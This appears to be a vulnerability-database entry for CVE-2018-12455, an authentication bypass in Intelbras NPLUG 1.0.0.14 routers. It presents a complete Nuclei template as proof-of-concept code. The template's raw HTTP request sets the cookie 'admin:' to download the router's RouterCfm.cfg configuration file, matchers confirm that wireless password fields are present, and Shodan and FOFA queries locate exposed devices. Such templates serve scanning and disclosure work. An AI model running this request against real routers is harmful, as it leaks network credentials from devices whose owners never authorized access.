CVE-2018-12455: Intelbras NPLUG 1.0.0.14 - Authentication Bypass

日期: 2025-08-01 | 影响软件: Intelbras NPLUG | POC: 已公开

漏洞描述

Intelbras NPLUG 1.0.0.14 is vulnerable to authentication bypass through cookie manipulation. An attacker can bypass authentication by simply setting a cookie named "admin:".

PoC代码[已公开]

id: CVE-2018-12455

info:
  name: Intelbras NPLUG 1.0.0.14 - Authentication Bypass
  author: ritikchaddha
  severity: critical
  description: |
    Intelbras NPLUG 1.0.0.14 is vulnerable to authentication bypass through cookie manipulation. An attacker can bypass authentication by simply setting a cookie named "admin:".
  remediation: |
    Update the device firmware to the latest version.
  reference:
    - https://seclists.org/fulldisclosure/2018/Oct/18
    - https://nvd.nist.gov/vuln/detail/CVE-2018-12455
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2018-12455
    cwe-id: CWE-287
    epss-score: 0.4527
    epss-percentile: 0.97526
    cpe: cpe:2.3:h:intelbras:nplug:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: intelbras
    product: nplug
    shodan-query: html:"NPLUG"
    fofa-query: title="NPLUG"
  tags: cve,cve2018,intelbras,auth-bypass,iot

http:
  - raw:
      - |
        GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.1
        Host: {{Hostname}}
        Cookie: admin:

    matchers:
      - type: dsl
        dsl:
          - "contains(content_type, 'config/conf')"
          - "contains_all(body, 'wl_', '_passwd')"
          - "status_code==200"
        condition: and
# digest: 4a0a00473045022047d84459789eb259965e59a36dcdd09a89c5e8d512bef0748ad55f6f85cefc240221009c7815de9d366817a93ef850c82a6458a85ef090a127ba7d462f788ab40159e1:922c64590222798bb761d5b6d8e72950